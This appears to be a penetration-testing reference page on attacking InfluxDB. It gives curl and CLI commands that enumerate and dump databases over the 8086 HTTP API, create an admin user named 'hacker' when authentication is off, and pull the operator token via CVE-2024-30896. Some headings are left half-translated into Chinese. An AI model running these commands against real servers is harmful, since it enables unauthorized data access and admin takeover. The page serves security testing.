If you **get an error like** this one: `ERR: unable to parse authentication credentials` it means that it's **expecting some credentials**.
influx –username influx –password influx_pass
There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-利用-CVE-2019-20933)
#### Manual 信息收集 (v1 HTTP API / InfluxQL)
Even when no CLI is available, the HTTP API is usually exposed on port 8086.
```bash
## List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"
## List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"
## List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"
## List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"
## List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"
## Dump data from a measurement
curl -sG "http://<host>:8086/query" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .
## Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
--data-urlencode "epoch=ns" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'
警告
In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: select * from "cpu"
If authentication is disabled, you can even create users and escalate:
## Create an admin user (v1, auth disabled)curl -sG "http://<host>:8086/query"\
--data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
The information of the following CLI example was taken from here.
Show databases
The found databases are telegraf and internal (you will find this one everywhere)
> show databases
name: databases
name
----
telegraf
_internal
Show tables/measurements
The InfluxDB documentation explains that measurements in InfluxDB can be paralleled with SQL tables. The nomenclature of these measurements is indicative of their respective content, each housing data relevant to a particular entity.
> show measurements
name: measurements
name
----
cpu
disk
diskio
kernel
mem
processes
swap
system
Show columns/field keys
The field keys are like the columns of the database
> show field keys
name: cpu
fieldKey fieldType
-------- ---------
usage_guest float
usage_guest_nice float
usage_idle float
usage_iowait float
name: disk
fieldKey fieldType
-------- ---------
free integer
inodes_free integer
inodes_total integer
inodes_used integer
[ ... more keys ...]
Dump Table
And finally you can dump the table doing something like
select * from cpu
name: cpu
time cpu host usage_guest usage_guest_nice usage_idle usage_iowait usage_irq usage_nice usage_softirq usage_steal usage_system usage_user
---- --- ---- ----------- ---------------- ---------- ------------ --------- ---------- ------------- ----------- ------------ ----------
1497018760000000000 cpu-total ubuntu 00 99.297893681046 00000 0.35105315947842414 0.35105315947842414
1497018760000000000 cpu1 ubuntu 00 99.69909729188728 00000 0.20060180541622202 0.10030090270811101
InfluxDB v2.x API (Token-based)
InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:
## Basic org, bucket, and auth discoveryTOKEN="<token>"; H="-H Authorization: Token $TOKEN"## Health & versioncurl -s http://<host>:8086/health | jq .
## List organizationscurl -s $H http://<host>:8086/api/v2/organizations | jq .
## List bucketscurl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .
## List authorizations (requires perms)ORGID=<org_id>
curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .
## Query data with Fluxcurl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux'\
-X POST http://<host>:8086/api/v2/query \
--data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'
Notes
For v1.8+, some v2-compatible endpoints exist (/api/v2/query, /api/v2/write, /health). This is useful if the server is v1 but accepts v2-style requests.
In v2, the HTTP 授权 header must be in the form Token <value>.
Automated 信息收集
msf6 > use auxiliary/scanner/http/influxdb_enum
Recent vulns and privesc of interest (last years)
InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via influx auth ls or GET /api/v2/authorizations). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test:
## Using a low-priv/all-access token tied to the default orgcurl -s -H 'Authorization: Token <user_or_allAccess_token>'\
'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
## Look for entries of type "operator" and extract the raw token (if present)
Many legacy 1.x deployments still expose /query and /write unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.